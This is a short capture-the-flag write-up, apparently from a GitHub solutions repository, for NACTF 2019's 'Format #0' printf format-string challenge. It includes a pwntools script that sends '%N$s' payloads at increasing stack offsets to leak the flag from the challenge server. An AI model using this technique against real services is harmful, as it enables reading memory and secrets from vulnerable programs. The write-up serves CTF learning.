ctftime

My solutions for various CTF challenges

View on GitHub

Format #0

Binary Exploitation - Points: 200

Someone didn’t tell Chaddha not to give user input as the first argument to printf() - use it to leak the flag!

Connect at shell.2019.nactf.com:31782

format-0.c

format-0

The script uses a format string to print out the contents on the stack with increasing offsets. At some point it will print out the buffer that contains the flag.

from pwn import *

for i in range(50):
	r = remote('ingress.cluster.nactf.com', 31782)
	r.sendline('%{}$s'.format(i))
	print r.recvall()